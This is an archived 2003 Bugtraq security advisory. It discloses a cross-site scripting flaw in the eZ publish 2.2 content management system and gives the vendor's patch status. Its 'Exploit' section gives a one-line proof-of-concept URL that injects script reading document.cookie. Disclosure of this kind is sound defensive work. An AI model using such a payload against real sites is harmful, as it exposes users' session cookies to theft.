lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <004b01c31b5a$5e517870$0b6aaec3@SS>
Date: Fri, 16 May 2003 06:22:20 +0300
From: "Ferruh Mavituna" <ferruh@...ituna.com>
To: <bugtraq@...urityfocus.com>
Subject: EzPublish Directory XSS Vulnerability

------------------------------------------------------
EzPublish "Directory" XSS Vulnerability
------------------------------------------------------

------------------------------------------------------
About Ezpublish;
------------------------------------------------------
PHP Based Content Management System
Vendor : http://ez.no
Demo : http://publishdemo.ez.no/

------------------------------------------------------
Vulnerable;
------------------------------------------------------
eZ publish 2.2

------------------------------------------------------
Not Vulnerable;
------------------------------------------------------
eZ publish 3

------------------------------------------------------
Vendor Status;
------------------------------------------------------
Vendor replied and send a new version of this file. (attached)

------------------------------------------------------
Patch;
------------------------------------------------------
You can download patched file in attachment.

------------------------------------------------------
Exploit;
------------------------------------------------------
http://[victim]/index.php/article/articleview/[img%20src="javascript:alert(document.cookie)"]

(Replace [], <>)


Ferruh Mavituna
Web Application Security Consultant
Freelance Developer & Designer
http://ferruh.mavituna.com
ferruh@...ituna.com

Download attachment "articleview.php" of type "application/octet-stream" (18831 bytes)

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ